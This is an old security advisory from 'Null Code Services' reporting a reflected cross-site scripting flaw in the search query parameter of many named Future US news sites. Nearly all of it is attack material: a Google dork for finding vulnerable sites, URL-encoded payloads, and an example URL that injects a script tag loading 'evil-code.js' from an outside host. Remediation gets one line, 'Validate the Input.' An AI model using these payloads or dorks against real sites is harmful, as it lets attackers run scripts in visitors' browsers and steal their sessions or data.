NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+===================================================================================================================+
+ Copyright 2008 - Copyright 2008 Future US //Cross-site scripting (XSS) Remote Java Execution +
+===================================================================================================================+
Author(s): Ivan Sanchez
Product: Copyright 2008 Future US
http://www.futureus-inc.com/
http://www.dailyradar.com/
Date: 16/01/2009
A lot domains are affected:
---------------------------
MovieBlips - Your daily movie news
ShowHype - Biggest stories, best fans
TVBlips - For TV aficionados only
42Blips - For science fiction fans
ComicsBlips - Excelsior! Comics news galore!
TotalFilm - Welcome to the movies!
BallHype - Best stories, biggest fans
ActionSportsBlips - Surf, Skate, Ski, Snowboard
BikeRadar - The world is for riding
MMABlips - News to fight for
RacingBlips - News built for speed
CyclingNews - The world centre of cycling
WallStreetBlips - Show me the money
BeltwayBlips - All politics, all the time
EarthBlips - Re-imagine the planet
much more......
Exploited from querystring or put into the texbox some evil xss-code or external java code , and then you can see the querystring :-
or directly you put the evil code on the querystring .
GOOGLE DORKS:
------------
intext:"Copyright 2008 Future US"
Parameter Affected:
-------------------
query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E
query=">&t=advanced&s=0&d=0&start=60
query=">
Example url:
http://domain/search/?query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E
Remediation: Validate the Input.
------------
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+===================================================================================================================+
+ Copyright 2008 - Copyright 2008 Future US // Cross-site scripting (XSS) Remote Java Execution +
+===================================================================================================================+